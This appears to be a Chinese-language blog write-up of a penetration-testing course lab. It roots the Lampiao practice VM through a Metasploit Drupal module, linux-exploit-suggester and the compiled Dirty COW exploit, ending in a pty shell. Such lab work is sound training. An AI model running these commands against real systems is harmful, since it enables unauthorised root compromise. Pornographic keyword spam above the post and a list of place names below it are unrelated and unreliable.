国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

CSA CCPTP模塊9-實(shí)驗(yàn)練習(xí)

2023-07-14 06:56 作者:北京老李2023  | 我要投稿

lampiao臟牛漏洞提權(quán)

1.主機(jī)掃描

arp-scan -l


2.端口掃描

nmap -A -sV -p- 192.168.254.135


看到開放了22,80,1898端口。

訪問80端口和1898端口。



在1898端口上發(fā)現(xiàn)了CMS信息。

3.滲透提權(quán)

漏洞發(fā)現(xiàn)有兩種方式,可以網(wǎng)上查找相關(guān)exp或者使用msf

2.msf

開啟msf。(也可在網(wǎng)上找相關(guān)exp)

msfconsole



利用msf上的模塊攻擊

search Drupal



使用第一個(gè)模塊

use 1

設(shè)置參數(shù)

set rhosts 192.168.254.135
set rport 1898



執(zhí)行。

run



上傳漏洞收集腳本到目標(biāo)主機(jī)賦予權(quán)限并執(zhí)行它

漏洞收集腳本:GitHub -
mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool



進(jìn)入到/tmp下



執(zhí)行腳本,發(fā)現(xiàn)臟牛漏洞。



上傳exp,進(jìn)行編譯過后py建立一個(gè)交互終端執(zhí)行編譯后的exp

臟牛漏洞
exp:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtcow.cpp -lutil//編譯exp
python -c 'import pty; pty.spawn("/bin/bash")'//開啟py終端



獲取到密碼,登錄root賬戶,提權(quán)成功。



CSA CCPTP模塊9-實(shí)驗(yàn)練習(xí)的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國家法律
遂溪县| 崇文区| 枞阳县| 祁东县| 乌拉特后旗| 深州市| 林芝县| 绥德县| 定襄县| 贺州市| 延庆县| 麻栗坡县| 宝山区| 叙永县| 仁化县| 张掖市| 华安县| 顺昌县| 惠州市| 姚安县| 宽甸| 芷江| 嘉定区| 温泉县| 松桃| 敦煌市| 白朗县| 靖边县| 泸水县| 宁化县| 岳西县| 弥勒县| 临朐县| 金寨县| 仙居县| 土默特右旗| 泰来县| 奎屯市| 海兴县| 准格尔旗| 巫山县|